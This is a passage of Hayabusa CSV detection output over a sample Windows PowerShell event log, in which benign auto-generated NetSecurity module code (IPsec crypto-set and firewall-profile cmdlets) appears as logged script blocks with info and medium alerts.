($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject 
(cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious 
PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.661 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.661 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.664 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, 
